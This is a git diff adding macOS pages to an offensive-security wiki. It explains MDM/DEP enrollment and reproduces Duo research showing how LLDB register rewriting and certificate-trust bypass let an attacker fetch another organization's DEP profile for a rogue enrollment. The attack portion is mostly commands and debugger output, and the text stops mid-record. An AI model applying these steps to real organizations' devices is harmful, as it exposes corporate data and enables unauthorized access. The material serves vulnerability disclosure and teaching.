+* ClientAliveCountMax 0 + +```bash +sudo launchctl unload /System/Library/LaunchDaemons/ssh.plist +sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist +``` + +### Internal Handlers + +[**Checkout this section**](./#file-extensions-apps) ****to find out how you can find which app is responsible of **handling the specified scheme or protocol**. + +### Enumerating Network Processes + +This interesting to find processes that are managing network data: + +```bash +dtrace -n 'syscall::recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' >> recv.log +#wait some time +sort -u recv.log > procs.txt +cat procs.txt +``` + +Or use `netstat` or `lsof` + +### More Fuzzing MacOS Info + +* [https://github.com/bnagy/slides/blob/master/OSXScale.pdf](https://github.com/bnagy/slides/blob/master/OSXScale.pdf) +* [https://github.com/bnagy/francis/tree/master/exploitaben](https://github.com/bnagy/francis/tree/master/exploitaben) +* [https://github.com/ant4g0nist/crashwrangler](https://github.com/ant4g0nist/crashwrangler) + +## References + +* [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS)\*\*\*\* +* \*\*\*\*[**https://www.youtube.com/watch?v=T5xfL9tEg44**](https://www.youtube.com/watch?v=T5xfL9tEg44)\*\*\*\* +* \*\*\*\*[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)\*\*\*\* + diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md new file mode 100644 index 00000000000..cba95c9c8ca --- /dev/null +++ b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md @@ -0,0 +1,189 @@ +# MacOS MDM + +## Basics + +### What is MDM \(Mobile Device Management\)? + +[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile_device_management) \(MDM\) is a technology commonly used to **administer end-user computing devices** such as mobile phones, laptops, desktops and tablets. In the case of Apple platforms like iOS, macOS and tvOS, it refers to a specific set of features, APIs and techniques used by administrators to manage these devices. Management of devices via MDM requires a compatible commercial or open-source MDM server that implements support for the [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). + +* A way to achieve **centralized device management** +* Requires an **MDM server** which implements support for the MDM protocol +* MDM server can **send MDM commands**, such as remote wipe or “install this config” + +### Basics What is DEP \(Device Enrolment Program\)? + +The [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP_Guide.pdf) \(DEP\) is a service offered by Apple that **simplifies** Mobile Device Management \(MDM\) **enrollment** by offering **zero-touch configuration** of iOS, macOS, and tvOS devices. Unlike more traditional deployment methods, which require the end-user or administrator to take action to configure a device, or manually enroll with an MDM server, DEP aims to bootstrap this process, **allowing the user to unbox a new Apple device and have it configured for use in the organization almost immediately**. + +Administrators can leverage DEP to automatically enroll devices in their organization’s MDM server. Once a device is enrolled, **in many cases it is treated as a “trusted”** device owned by the organization, and could receive any number of certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf). + +* Allows a device to automatically enroll in pre-configured MDM server the **first time it’s powered** on +* Most useful when the **device** is **brand new** +* Can also be useful for **reprovisioning** workflows \(**wiped** with fresh install of the OS\) + +{% hint style="danger" %} +Unfortunately, if an organization has not taken additional steps to **protect their MDM enrollment**, a simplified end-user enrollment process through DEP can also mean a simplified process for **attackers to enroll a device of their choosing in the organization’s MDM** server, assuming the "identity" of a corporate device. +{% endhint %} + +### Basics What is SCEP \(Simple Certificate Enrolment Protocol\)? + +* A relatively old protocol, created before TLS and HTTPS were widespread. +* Gives clients a standardized way of sending a **Certificate Signing Request** \(CSR\) for the purpose of being granted a certificate. The client will ask the server to give him a signed certificate. + +### What are Configuration Profiles \(aka mobileconfigs\)? + +* Apple’s official way of **setting/enforcing system configuration.** +* File format that can contain multiple payloads. +* Based on property lists \(the XML kind\). +* “can be signed and encrypted to validate their origin, ensure their integrity, and protect their contents.” Basics — Page 70, iOS Security Guide, January 2018. + +## Protocols + +### MDM + +* Combination of APNs \(**Apple server**s\) + RESTful API \(**MDM** **vendor** servers\) +* **Communication** occurs between a **device** and a server associated with a **device** **management** **product** +* **Commands** delivered from the MDM to the device in **plist-encoded dictionaries** +* All over **HTTPS**. MDM servers can be \(and are usually\) pinned. +* Apple grants the MDM vendor an **APNs certificate** for authentication + +### DEP + +* **3 APIs**: 1 for resellers, 1 for MDM vendors, 1 for device identity \(undocumented\): + * The so-called [DEP "cloud service" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). This is used by MDM servers to associate DEP profiles with specific devices. + * The [DEP API used by Apple Authorized Resellers](https://applecareconnect.apple.com/api-docs/depuat/html/WSImpManual.html) to enroll devices, check enrollment status, and check transaction status. + * The undocumented private DEP API. This is used by Apple Devices to request their DEP profile. On macOS, the `cloudconfigurationd` binary is responsible for communicating over this API. +* More modern and **JSON** based \(vs. plist\) +* Apple grants an **OAuth token** to the MDM vendor + +#### DEP "cloud service" API + +* RESTful +* sync device records from Apple to the MDM server +* sync “DEP profiles” to Apple from the MDM server \(delivered by Apple to the device later on\) +* A DEP “profile” contains: + * MDM vendor server URL + * Additional trusted certificates for server URL \(optional pinning\) + * Extra settings \(e.g. which screens to skip in Setup Assistant\) + +## Steps for enrolment and management + +1. Device record creation \(Reseller, Apple\): The record for the new device is created +2. Device record assignment \(Customer\): The device is assigned to a MDM server +3. Device record sync \(MDM vendor\): MDM sync the device records and push the DEP profiles to Apple +4. DEP check-in \(Device\): Device gets his DEP profile +5. Profile retrieval \(Device\) +6. Profile installation \(Device\) a. incl. MDM, SCEP and root CA payloads +7. MDM command issuance \(Device\) + +![](../../../.gitbook/assets/image%20%28564%29.png) + +The file `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd` exports functions that can be considered **high-level "steps"** of the enrolment process. + +### Step 4: DEP check-in - Getting the Activation Record + +This part of the process occurs when a **user boots a Mac for the first time** \(or after a complete wipe\) + +![](../../../.gitbook/assets/image%20%28568%29.png) + +or when executing `sudo profiles show -type enrollment` + +* Determine **whether device is DEP enabled** +* Activation Record is the internal name for **DEP “profile”** +* Begins as soon as the device is connected to Internet +* Driven by **`CPFetchActivationRecord`** +* Implemented by **`cloudconfigurationd`** via XPC. The **"Setup Assistant**" \(when the device is firstly booted\) or the **`profiles`** command will **contact this daemon** to retrieve the activation record. + * LaunchDaemon \(always runs as root\) + +It follows a few steps to get the Activation Record performed by **`MCTeslaConfigurationFetcher`**. This process uses an encryption called **Absinthe** + +1. Retrieve **certificate** + 1. GET [https://iprofiles.apple.com/resource/certificate.cer](https://iprofiles.apple.com/resource/certificate.cer) +2. **Initialize** state from certificate \(**`NACInit`**\) + 1. Uses various device-specific data \(i.e. **Serial Number via `IOKit`**\) +3. Retrieve **session key** + 1. POST [https://iprofiles.apple.com/session](https://iprofiles.apple.com/session) +4. Establish the session \(**`NACKeyEstablishment`**\) +5. Make the request + 1. POST to [https://iprofiles.apple.com/macProfile](https://iprofiles.apple.com/macProfile) sending the data `{ "action": "RequestProfileConfiguration", "sn": "" }` + 2. The JSON payload is encrypted using Absinthe \(**`NACSign`**\) + 3. All requests over HTTPs, built-in root certificates are used + +![](../../../.gitbook/assets/image%20%28566%29.png) + +The response is a JSON dictionary with some important data like: + +* **url**: URL of the MDM vendor host for the activation profile +* **anchor-certs**: Array of DER certificates used as trusted anchors + +### **Step 5: Profile Retrieval** + +![](../../../.gitbook/assets/image%20%28569%29.png) + +* Request sent to **url provided in DEP profile**. +* **Anchor certificates** are used to **evaluate trust** if provided. + * Reminder: the **anchor\_certs** property of the DEP profile +* **Request is a simple .plist** with device identification + * Examples: **UDID, OS version**. +* CMS-signed, DER-encoded +* Signed using the **device identity certificate \(from APNS\)** +* **Certificate chain** includes expired **Apple iPhone Device CA** + +![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29.png) + +### Step 6: Profile Installation + +* Once retrieved, **profile is stored on the system** +* This step begins automatically \(if in **setup assistant**\) +* Driven by **`CPInstallActivationProfile`** +* Implemented by mdmclient over XPC + * LaunchDaemon \(as root\) or LaunchAgent \(as user\), depending on context +* Configuration profiles have multiple payloads to install +* Framework has a plugin-based architecture for installing profiles +* Each payload type is associated with a plugin + * Can be XPC \(in framework\) or classic Cocoa \(in ManagedClient.app\) +* Example: + * Certificate Payloads use CertificateService.xpc + +Typically, **activation profile** provided by an MDM vendor will **include the following payloads**: + +* `com.apple.mdm`: to **enroll** the device in MDM +* `com.apple.security.scep`: to securely provide a **client certificate** to the device. +* `com.apple.security.pem`: to **install trusted CA certificates** to the device’s System Keychain. +* Installing the MDM payload equivalent to **MDM check-in in the documentation** +* Payload **contains key properties**: +* * MDM Check-In URL \(**`CheckInURL`**\) + * MDM Command Polling URL \(**`ServerURL`**\) + APNs topic to trigger it +* To install MDM payload, request is sent to **`CheckInURL`** +* Implemented in **`mdmclient`** +* MDM payload can depend on other payloads +* Allows **requests to be pinned to specific certificates**: + * Property: **`CheckInURLPinningCertificateUUIDs`** + * Property: **`ServerURLPinningCertificateUUIDs`** + * Delivered via PEM payload +* Allows device to be attributed with an identity certificate: + * Property: IdentityCertificateUUID + * Delivered via SCEP payload + +### **Step 7: Listening for MDM commands** + +* After MDM check-in is complete, vendor can **issue push notifications using APNs** +* Upon receipt, handled by **`mdmclient`** +* To poll for MDM commands, request is sent to ServerURL +* Makes use of previously installed MDM payload: + * **`ServerURLPinningCertificateUUIDs`** for pinning request + * **`IdentityCertificateUUID`** for TLS client certificate + +## Attacks + +### Enrolling Devices in Other Organisations + +As previously commented, in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf). +Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected: + +{% page-ref page="enrolling-devices-in-other-organisations.md" %} + +## **References** + +* [https://www.youtube.com/watch?v=ku8jZe-MHUU](https://www.youtube.com/watch?v=ku8jZe-MHUU) +* [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe) + diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md b/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md new file mode 100644 index 00000000000..ec9ba04ccc3 --- /dev/null +++ b/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md @@ -0,0 +1,423 @@ +# Enrolling Devices in Other Organisations + +## Intro + +As ****[**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf). +Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected. + +**The following research is taken from** [**https://duo.com/labs/research/mdm-me-maybe**](https://duo.com/labs/research/mdm-me-maybe)\*\*\*\* + +## Reversing the process + +### Binaries Involved in DEP and MDM + +Throughout our research, we explored the following: + +* **`mdmclient`**: Used by the OS to communicate with an MDM server. On macOS 10.13.3 and earlier, it can also be used to trigger a DEP check-in. +* **`profiles`**: A utility that can be used to install, remove and view Configuration Profiles on macOS. It can also be used to trigger a DEP check-in on macOS 10.13.4 and newer. +* **`cloudconfigurationd`**: The Device Enrollment client daemon, which is responsible for communicating with the DEP API and retrieving Device Enrollment profiles. + +When using either `mdmclient` or `profiles` to initiate a DEP check-in, the `CPFetchActivationRecord` and `CPGetActivationRecord` functions are used to retrieve the _Activation Record_. `CPFetchActivationRecord` delegates control to `cloudconfigurationd` through [XPC](https://developer.apple.com/documentation/xpc), which then retrieves the _Activation Record_ from the DEP API. + +`CPGetActivationRecord` retrieves the _Activation Record_ from cache, if available. These functions are defined in the private Configuration Profiles framework, located at `/System/Library/PrivateFrameworks/Configuration Profiles.framework`. + +### Reverse Engineering the Tesla Protocol and Absinthe Scheme + +During the DEP check-in process, `cloudconfigurationd` requests an _Activation Record_ from _iprofiles.apple.com/macProfile_. The request payload is a JSON dictionary containing two key-value pairs: + +```text +{ +"sn": "", +action": "RequestProfileConfiguration +} +``` + +The payload is signed and encrypted using a scheme internally referred to as "Absinthe." The encrypted payload is then Base 64 encoded and used as the request body in an HTTP POST to _iprofiles.apple.com/macProfile_. + +In `cloudconfigurationd`, fetching the _Activation Record_ is handled by the `MCTeslaConfigurationFetcher` class. The general flow from `[MCTeslaConfigurationFetcher enterState:]` is as follows: + +```text +rsi = @selector(verifyConfigBag); +rsi = @selector(startCertificateFetch); +rsi = @selector(initializeAbsinthe); +rsi = @selector(startSessionKeyFetch); +rsi = @selector(establishAbsintheSession); +rsi = @selector(startConfigurationFetch); +rsi = @selector(sendConfigurationInfoToRemote); +rsi = @selector(sendFailureNoticeToRemote); +``` + +Since the **Absinthe** scheme is what appears to be used to authenticate requests to the DEP service, **reverse engineering** this scheme would allow us to make our own authenticated requests to the DEP API. This proved to be **time consuming**, though, mostly because of the number of steps involved in authenticating requests. Rather than fully reversing how this scheme works, we opted to explore other methods of inserting arbitrary serial numbers as part of the _Activation Record_ request. + +### MITMing DEP Requests + +We explored the feasibility of proxying network requests to _iprofiles.apple.com_ with [Charles Proxy](https://www.charlesproxy.com/). Our goal was to inspect the payload sent to _iprofiles.apple.com/macProfile_, then insert an arbitrary serial number and replay the request. As previously mentioned, the payload submitted to that endpoint by `cloudconfigurationd` is in [JSON](https://www.json.org/) format and contains two key-value pairs. + +```text +{ +"action": "RequestProfileConfiguration", +sn": " +} +``` + +Since the API at _iprofiles.apple.com_ uses [Transport Layer Security](https://en.wikipedia.org/wiki/Transport_Layer_Security) \(TLS\), we needed to enable SSL Proxying in Charles for that host to see the plain text contents of the SSL requests. + +However, the `-[MCTeslaConfigurationFetcher connection:willSendRequestForAuthenticationChallenge:]` method checks the validity of the server certificate, and will abort if server trust cannot be verified. + +```text +[ERROR] Unable to get activation record: Error Domain=MCCloudConfigurationErrorDomain Code=34011 +"The Device Enrollment server trust could not be verified. Please contact your system +administrator." UserInfo={USEnglishDescription=The Device Enrollment server trust could not be +verified. Please contact your system administrator., NSLocalizedDescription=The Device Enrollment +server trust could not be verified. Please contact your system administrator., +MCErrorType=MCFatalError} +``` + +The error message shown above is located in a binary _Errors.strings_ file with the key `CLOUD_CONFIG_SERVER_TRUST_ERROR`, which is located at `/System/Library/CoreServices/ManagedClient.app/Contents/Resources/English.lproj/Errors.strings`, along with other related error messages. + +```text +$ cd /System/Library/CoreServices +$ rg "The Device Enrollment server trust could not be verified" +ManagedClient.app/Contents/Resources/English.lproj/Errors.strings + +``` + +The _Errors.strings_ file can be [printed in a human-readable format](https://duo.com/labs/research/mdm-me-maybe#error_strings_output) with the built-in `plutil` command. + +```text +$ plutil -p /System/Library/CoreServices/ManagedClient.app/Contents/Resources/English.lproj/Errors.strings +``` + +After looking into the `MCTeslaConfigurationFetcher` class further, though, it became clear that this server trust behavior can be circumvented by enabling the `MCCloudConfigAcceptAnyHTTPSCertificate` configuration option on the `com.apple.ManagedClient.cloudconfigurationd` preference domain. + +```text +loc_100006406: +rax = [NSUserDefaults standardUserDefaults]; +rax = [rax retain]; +r14 = [rax boolForKey:@"MCCloudConfigAcceptAnyHTTPSCertificate"]; +r15 = r15; +[rax release]; +if (r14 != 0x1) goto loc_10000646f; +``` + +The `MCCloudConfigAcceptAnyHTTPSCertificate` configuration option can be set with the `defaults` command. + +```text +sudo defaults write com.apple.ManagedClient.cloudconfigurationd MCCloudConfigAcceptAnyHTTPSCertificate -bool yes +``` + +With SSL Proxying enabled for _iprofiles.apple.com_ and `cloudconfigurationd` configured to accept any HTTPS certificate, we attempted to man-in-the-middle and replay the requests in Charles Proxy. + +However, since the payload included in the body of the HTTP POST request to _iprofiles.apple.com/macProfile_ is signed and encrypted with Absinthe, \(`NACSign`\), **it isn't possible to modify the plain text JSON payload to include an arbitrary serial number without also having the key to decrypt it**. Although it would be possible to obtain the key because it remains in memory, we instead moved on to exploring `cloudconfigurationd` with the [LLDB](https://lldb.llvm.org/) debugger. + +### Instrumenting System Binaries That Interact With DEP + +The final method we explored for automating the process of submitting arbitrary serial numbers to _iprofiles.apple.com/macProfile_ was to instrument native binaries that either directly or indirectly interact with the DEP API. This involved some initial exploration of the `mdmclient`, `profiles`, and `cloudconfigurationd` in [Hopper v4](https://www.hopperapp.com/) and [Ida Pro](https://www.hex-rays.com/products/ida/), and some lengthy debugging sessions with `lldb`. + +One of the benefits of this method over modifying the binaries and re-signing them with our own key is that it sidesteps some of the entitlements restrictions built into macOS that might otherwise deter us. + +**System Integrity Protection** + +In order to instrument system binaries, \(such as `cloudconfigurationd`\) on macOS, [System Integrity Protection](https://support.apple.com/en-us/HT204899) \(SIP\) must be disabled. SIP is a security technology that protects system-level files, folders, and processes from tampering, and is enabled by default on OS X 10.11 “El Capitan” and later. [SIP can be disabled](https://developer.apple.com/library/archive/documentation/Security/Conceptual/System_Integrity_Protection_Guide/ConfiguringSystemIntegrityProtection/ConfiguringSystemIntegrityProtection.html) by booting into Recovery Mode and running the following command in the Terminal application, then rebooting: + +```text +csrutil enable --without debug +``` + +It’s worth noting, however, that SIP is a useful security feature and should not be disabled except for research and testing purposes on non-production machines. It’s also possible \(and recommended\) to do this on non-critical Virtual Machines rather than on the host operating system. + +**Binary Instrumentation With LLDB** + +With SIP disabled, we were then able to move forward with instrumenting the system binaries that interact with the DEP API, namely, the `cloudconfigurationd` binary. Because `cloudconfigurationd` requires elevated privileges to run, we need to start `lldb` with `sudo`. + +```text +$ sudo lldb +(lldb) process attach --waitfor --name cloudconfigurationd +``` + +While `lldb` is waiting, we can then attach to `cloudconfigurationd` by running `sudo /usr/libexec/mdmclient dep nag` in a separate Terminal window. Once attached, output similar to the following will be displayed and LLDB commands can be typed at the prompt. + +```text +Process 861 stopped +* thread #1, stop reason = signal SIGSTOP + +Target 0: (cloudconfigurationd) stopped. + +Executable module set to "/usr/libexec/cloudconfigurationd". +Architecture set to: x86_64h-apple-macosx. +(lldb) +``` + +**Setting the Device Serial Number** + +One of the first things we looked for when reversing `mdmclient` and `cloudconfigurationd` was the code responsible for retrieving the system serial number, as we knew the serial number was ultimately responsible for authenticating the device. Our goal was to modify the serial number in memory after it is retrieved from the [`IORegistry`](https://developer.apple.com/documentation/installerjs/ioregistry), and have that be used when `cloudconfigurationd` constructs the `macProfile` payload. + +Although `cloudconfigurationd` is ultimately responsible for communicating with the DEP API, we also looked into whether the system serial number is retrieved or used directly within `mdmclient`. The serial number retrieved as shown below is not what is sent to the DEP API, but it did reveal a hard-coded serial number that is used if a specific configuration option is enabled. + +```text +int sub_10002000f() { +if (sub_100042b6f() != 0x0) { +r14 = @"2222XXJREUF"; +} +else { +rax = IOServiceMatching("IOPlatformExpertDevice"); +rax = IOServiceGetMatchingServices(*(int32_t *)*_kIOMasterPortDefault, rax, &var_2C); + +} +rax = r14; +return rax; +} +``` + +The system serial number is retrieved from the [`IORegistry`](https://developer.apple.com/documentation/installerjs/ioregistry), unless the return value of `sub_10002000f` is nonzero, in which case it’s set to the static string “2222XXJREUF”. Upon inspecting that function, it appears to check whether “Server stress test mode” is enabled. + +```text +void sub_1000321ca(void * _block) { +if (sub_10002406f() != 0x0) { +*(int8_t *)0x100097b68 = 0x1; +sub_10000b3de(@"Server stress test mode enabled", rsi, rdx, rcx, r8, r9, stack[0]); +} +return; +} +``` + +We documented the existence of “server stress test mode,” but didn’t explore it any further, as our goal was to modify the serial number presented to the DEP API. Instead, we tested whether modifying the serial number pointed to by the `r14` register would suffice in retrieving an _Activation Record_ that was not meant for the machine we were testing on. + +Next, we looked at how the system serial number is retrieved within `cloudconfigurationd`. + +```text +int sub_10000c100(int arg0, int arg1, int arg2, int arg3) { +var_50 = arg3; +r12 = arg2; +r13 = arg1; +r15 = arg0; +rbx = IOServiceGetMatchingService(*(int32_t *)*_kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice")); +r14 = 0xffffffffffff541a; +if (rbx != 0x0) { +rax = sub_10000c210(rbx, @"IOPlatformSerialNumber", 0x0, &var_30, &var_34); +r14 = rax; + +} +rax = r14; +return rax; +} +``` + +As can be seen above, the serial number is retrieved from the [`IORegistry`](https://developer.apple.com/documentation/installerjs/ioregistry) in `cloudconfigurationd` as well. + +Using `lldb`, we were able to modify the serial number retrieved from the [`IORegistry`](https://developer.apple.com/documentation/installerjs/ioregistry) by setting a breakpoint for `IOServiceGetMatchingService` and creating a new string variable containing an arbitrary serial number and rewriting the `r14` register to point to the memory address of the variable we created. + +```text +(lldb) breakpoint set -n IOServiceGetMatchingService +# Run `sudo /usr/libexec/mdmclient dep nag` in a separate Terminal window. +(lldb) process attach --waitfor --name cloudconfigurationd +Process 2208 stopped +* thread #2, queue = 'com.apple.NSXPCListener.service.com.apple.ManagedClient.cloudconfigurationd', +stop reason = instruction step over frame #0: 0x000000010fd824d8 +cloudconfigurationd`___lldb_unnamed_symbol2$$cloudconfigurationd + 73 +cloudconfigurationd`___lldb_unnamed_symbol2$$cloudconfigurationd: +-> 0x10fd824d8 <+73>: movl %ebx, %edi +0x10fd824da <+75>: callq 0x10ffac91e ; symbol stub for: IOObjectRelease +0x10fd824df <+80>: testq %r14, %r14 +0x10fd824e2 <+83>: jne 0x10fd824e7 ; <+88> +Target 0: (cloudconfigurationd) stopped. +(lldb) continue # Will hit breakpoint at `IOServiceGetMatchingService` +# Step through the program execution by pressing 'n' a bunch of times and +# then 'po $r14' until we see the serial number. +(lldb) n +(lldb) po $r14 +C02JJPPPQQQRR # The system serial number retrieved from the `IORegistry` +# Create a new variable containing an arbitrary serial number and print the memory address. +(lldb) p/x @"C02XXYYZZNNMM" +(__NSCFString *) $79 = 0x00007fb6d7d05850 @"C02XXYYZZNNMM" +# Rewrite the `r14` register to point to our new variable. +(lldb) register write $r14 0x00007fb6d7d05850 +(lldb) po $r14 +# Confirm that `r14` contains the new serial number. +C02XXYYZZNNMM +``` + +Although we were successful in modifying the serial number retrieved from the [`IORegistry`](https://developer.apple.com/documentation/installerjs/ioregistry), the `macProfile` payload still contained the system serial number, not the one we wrote to the `r14` register. + +**Exploit: Modifying the Profile Request Dictionary Prior to JSON Serialization** + +Next, we tried setting the serial number that is sent in the `macProfile` payload in a different way. This time, rather than modifying the system serial number retrieved via [`IORegistry`](https://developer.apple.com/documentation/installerjs/ioregistry), we tried to find the closest point in the code where the serial number is still in plain text before being signed with Absinthe \(`NACSign`\). The best point to look at appeared to be `-[MCTeslaConfigurationFetcher startConfigurationFetch]`, which roughly performs the following steps: + +* Creates a new `NSMutableData` object +* Calls `[MCTeslaConfigurationFetcher setConfigurationData:]`, passing it the new `NSMutableData` object +* Calls `[MCTeslaConfigurationFetcher profileRequestDictionary]`, which returns an `NSDictionary` object containing two key-value pairs: +* `sn`: The system serial number +* `action`: The remote action to perform \(with `sn` as its argument\) +* Calls `[NSJSONSerialization dataWithJSONObject:]`, passing it the `NSDictionary` from `profileRequestDictionary` +* Signs the JSON payload using Absinthe \(`NACSign`\) +* Base64 encodes the signed JSON payload +* Sets the HTTP method to `POST` +* Sets the HTTP body to the base64 encoded, signed JSON payload +* Sets the `X-Profile-Protocol-Version` HTTP header to `1` +* Sets the `User-Agent` HTTP header to `ConfigClient-1.0` +* Uses the `[NSURLConnection alloc] initWithRequest:delegate:startImmediately:]` method to perform the HTTP request + +We then modified the `NSDictionary` object returned from `profileRequestDictionary` before being converted into JSON. To do this, a breakpoint was set on `dataWithJSONObject` in order to get us as close as possible to the as-yet unconverted data as possible. The breakpoint was successful, and when we printed the contents of the register we knew through the disassembly \(`rdx`\) that we got the results we expected to see. + +```text +po $rdx +{ +action = RequestProfileConfiguration; +sn = C02XXYYZZNNMM; +} +``` + +The above is a pretty-printed representation of the `NSDictionary` object returned by `[MCTeslaConfigurationFetcher profileRequestDictionary]`. Our next challenge was to modify the in-memory `NSDictionary` containing the serial number. + +```text +(lldb) breakpoint set -r "dataWithJSONObject" +# Run `sudo /usr/libexec/mdmclient dep nag` in a separate Terminal window. +(lldb) process attach --name "cloudconfigurationd" --waitfor +Process 3291 stopped +* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1 +frame #0: 0x00007fff2e8bfd8f Foundation`+[NSJSONSerialization dataWithJSONObject:options:error:] +Target 0: (cloudconfigurationd) stopped. +# Hit next breakpoint at `dataWithJSONObject`, since the first one isn't where we need to change the serial number. +(lldb) continue +# Create a new variable containing an arbitrary `NSDictionary` and print the memory address. +(lldb) p/x (NSDictionary *)[[NSDictionary alloc] initWithObjectsAndKeys:@"C02XXYYZZNNMM", @"sn", +@"RequestProfileConfiguration", @"action", nil] +(__NSDictionaryI *) $3 = 0x00007ff068c2e5a0 2 key/value pairs +# Confirm that `rdx` contains the new `NSDictionary`. +po $rdx +{ +action = RequestProfileConfiguration; +sn = +} +``` + +The listing above does the following: + +* Creates a regular expression breakpoint for the `dataWithJSONObject` selector +* Waits for the `cloudconfigurationd` process to start, then attaches to it +* `continue`s execution of the program, \(because the first breakpoint we hit for `dataWithJSONObject` is not the one called on the `profileRequestDictionary`\) +* Creates and prints \(in hex format due to the `/x`\) the result of creating our arbitrary `NSDictionary` +* Since we already know the names of the required keys we can simply set the serial number to one of our choice for `sn` and leave action alone +* The printout of the result of creating this new `NSDictionary` tells us we have two key-value pairs at a specific memory location + +Our final step was now to repeat the same step of writing to `rdx` the memory location of our custom `NSDictionary` object that contains our chosen serial number: + +```text +(lldb) register write $rdx 0x00007ff068c2e5a0 # Rewrite the `rdx` register to point to our new variable +(lldb) continue +``` + +This points the `rdx` register to our new `NSDictionary` right before it's serialized to [JSON](https://www.json.org/) and `POST`ed to _iprofiles.apple.com/macProfile_, then `continue`s program flow. + +This method of modifying the serial number in the profile request dictionary before being serialized to JSON worked. When using a known-good DEP-registered Apple serial number instead of \(null\), the debug log for `ManagedClient` showed the complete DEP profile for the device: + +```text +Apr 4 16:21:35[660:1]:+CPFetchActivationRecord fetched configuration: +{ +AllowPairing = 1; +AnchorCertificates = ( +); +AwaitDeviceConfigured = 0; +ConfigurationURL = "https://some.url/cloudenroll"; +IsMDMUnremovable = 1; +IsMandatory = 1; +IsSupervised = 1; +OrganizationAddress = "Org address"; +OrganizationAddressLine1 = "More address"; +OrganizationAddressLine2 = NULL; +OrganizationCity = A City; +OrganizationCountry = US; +OrganizationDepartment = "Org Dept"; +OrganizationEmail = "dep.management@org.url"; +OrganizationMagic = ; +OrganizationName = "ORG NAME"; +OrganizationPhone = "+1551234567"; +OrganizationSupportPhone = "+15551235678"; +OrganizationZipCode = "ZIPPY"; +SkipSetup = ( +AppleID, +Passcode, +Zoom, +Biometric, +Payment, +TOS, +TapToSetup, +Diagnostics, +HomeButtonSensitivity, +Android, +Siri, +DisplayTone, +ScreenSaver +); +SupervisorHostCertificates = ( +); +} +``` + +With just a few `lldb` commands we can successfully insert an arbitrary serial number and get a DEP profile that includes various organization-specific data, including the organization's MDM enrollment URL. As discussed, this enrollment URL could be used to enroll a rogue device now that we know its serial number. The other data could be used to social engineer a rogue enrollment. Once enrolled, the device could receive any number of certificates, profiles, applications, VPN configurations and so on. + +### Automating `cloudconfigurationd` Instrumentation With Python + +Once we had the initial proof-of-concept demonstrating how to retrieve a valid DEP profile using just a serial number, we set out to automate this process to show how an attacker might abuse this weakness in authentication. + +Fortunately, the LLDB API is available in Python through a [script-bridging interface](https://lldb.llvm.org/python-reference.html). On macOS systems with the [Xcode Command Line Tools](https://developer.apple.com/download/more/) installed, the `lldb` Python module can be imported as follows: + +```text +import lldb +``` + +This made it relatively easy to script our proof-of-concept demonstrating how to insert a DEP-registered serial number and receive a valid DEP profile in return. The PoC we developed takes a list of serial numbers separated by newlines and injects them into the `cloudconfigurationd` process to check for DEP profiles. + +![Charles SSL Proxying Settings.](https://duo.com/img/asset/aW1nL2xhYnMvcmVzZWFyY2gvaW1nL2NoYXJsZXNfc3NsX3Byb3h5aW5nX3NldHRpbmdzLnBuZw==?w=800&fit=contain&s=d1c9216716bf619e7e10e45c9968f83b) + +![DEP Notification.](https://duo.com/img/asset/aW1nL2xhYnMvcmVzZWFyY2gvaW1nL2RlcF9ub3RpZmljYXRpb24ucG5n?w=800&fit=contain&s=4f7b95efd02245f9953487dcaac6a961) + +### Impact + +There are a number of scenarios in which Apple's Device Enrollment Program could be abused that would lead to exposing sensitive information about an organization. The two most obvious scenarios involve obtaining information about the organization that a device belongs to, which can be retrieved from the DEP profile. The second is using this information to perform a rogue DEP and MDM enrollment. Each of these are discussed further below. + +#### Information Disclosure + +As mentioned previously, part of the DEP enrollment process involves requesting and receiving an _Activation Record_, \(or DEP profile\), from the DEP API. By providing a valid, DEP-registered system serial number, we're able to retrieve the following information, \(either printed to `stdout` or written to the `ManagedClient` log, depending on macOS version\). + +```text +Activation record: { +AllowPairing = 1; +AnchorCertificates = ( + +); +AwaitDeviceConfigured = 0; +ConfigurationURL = "https://example.com/enroll"; +IsMDMUnremovable = 1; +IsMandatory = 1; +IsSupervised = 1; +OrganizationAddress = "123 Main Street, Anywhere, , 12345 (USA)"; +OrganizationAddressLine1 = "123 Main Street"; +OrganizationAddressLine2 = NULL; +OrganizationCity = Anywhere; +OrganizationCountry = USA; +OrganizationDepartment = "IT"; +OrganizationEmail = "dep@example.com"; +OrganizationMagic = 105CD5B18CE24784A3A0344D6V63CD91; +OrganizationName = "Example, Inc."; +OrganizationPhone = "+15555555555"; +OrganizationSupportPhone = 